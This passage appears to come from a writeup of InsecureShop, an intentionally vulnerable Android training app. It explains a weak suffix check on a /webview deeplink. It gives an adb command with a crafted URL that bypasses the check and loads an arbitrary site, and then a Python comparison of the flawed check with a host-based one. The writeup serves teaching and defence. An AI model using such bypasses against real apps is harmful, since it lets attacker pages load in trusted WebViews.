😄 Vulnerability #6: Weak Host Validation

Now let's focus on the else if block that handles a deeplink whose path is /webview. As in the previous vulnerability, it reads the data URI from the intent and extracts the ?url query parameter.

However, there is an additional step that checks whether the URL we retrieved ends with the string insecureshopapp.com. This is presumably meant to allow only URLs the developers own to be opened in the WebView. The check is weak, though: it tests a suffix of the whole URL string rather than the host, so placing the trusted name at the end of a query parameter satisfies it while the page that is actually loaded is whatever we choose. We can easily bypass the check:

C:\Users\Aniket\Downloads\InsecureShop-Writeup>adb shell am start -a android.intent.action.VIEW -c android.intent.category.BROWSABLE -d insecureshop://com.insecureshop/webview?url=https://google.com/?ignore=insecureshopapp.com
Starting: Intent { act=android.intent.action.VIEW cat=[android.intent.category.BROWSABLE] dat=insecureshop://com.insecureshop/webview?url=https://google.com/?ignore=insecureshopapp.com }
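As an added illustration that is not InsecureShop's own code, the following Python places the suffix check described above next to a parse-then-compare check and runs both over the deeplink from the writeup. The TRUSTED_HOST value and the sample URLs other than the writeup's own are assumptions constructed for this example; the extract_url_param helper stands in for the app's intent/query-parameter handling and is not the app's actual code.

```python
"""Added example (not InsecureShop's code): host validation for a /webview
deeplink, the weak whole-string suffix check beside a host-based check."""
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumption for this example: the host the app intends to trust.
TRUSTED_HOST = "insecureshopapp.com"


def extract_url_param(deeplink: str) -> Optional[str]:
    """Pull the ?url= value out of a deeplink, as the /webview branch does."""
    values = parse_qs(urlsplit(deeplink).query).get("url")
    return values[0] if values else None


def weak_check(url: str) -> bool:
    """The pattern the writeup describes: a suffix match on the raw URL string.
    The query and fragment are part of that string, so the trusted name only
    has to appear at the very end, wherever it is placed."""
    return url.endswith(TRUSTED_HOST)


def strict_check(url: str, trusted_host: str = TRUSTED_HOST) -> bool:
    """Hardened form: parse first, then compare only the host component."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lower-cased, userinfo and port stripped
    except ValueError:         # malformed authority, e.g. bad IPv6 brackets
        return False
    if parts.scheme != "https" or not host:
        return False
    host = host.rstrip(".")    # "insecureshopapp.com." is the same FQDN
    # Exact host or a label-aligned subdomain. A bare suffix test on the host
    # alone would still accept "evilinsecureshopapp.com", hence the "." boundary.
    return host == trusted_host or host.endswith("." + trusted_host)


def evaluate(url: str) -> Tuple[bool, bool]:
    """Return (weak_check result, strict_check result) for one URL."""
    return weak_check(url), strict_check(url)


# Constructed input: the deeplink from the writeup's adb command.
BYPASS_DEEPLINK = (
    "insecureshop://com.insecureshop/webview"
    "?url=https://google.com/?ignore=insecureshopapp.com"
)

if __name__ == "__main__":
    # Constructed sample URLs alongside the writeup's own.
    candidates = [
        extract_url_param(BYPASS_DEEPLINK),
        "https://insecureshopapp.com",
        "https://insecureshopapp.com/offers",
        "https://www.insecureshopapp.com/",
        "https://evilinsecureshopapp.com/",
        "http://insecureshopapp.com",
    ]
    for candidate in candidates:
        weak, strict = evaluate(candidate)
        print(f"{candidate:55} weak={weak!s:5} strict={strict}")
```

Running it shows the two failure modes of the suffix check at once: the writeup's URL passes it even though the host is google.com, while a legitimate https://insecureshopapp.com/offers fails it because the string no longer ends with the domain. Comparing the parsed host, with the scheme pinned and subdomains matched on a label boundary, accepts the legitimate URLs and rejects the rest.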
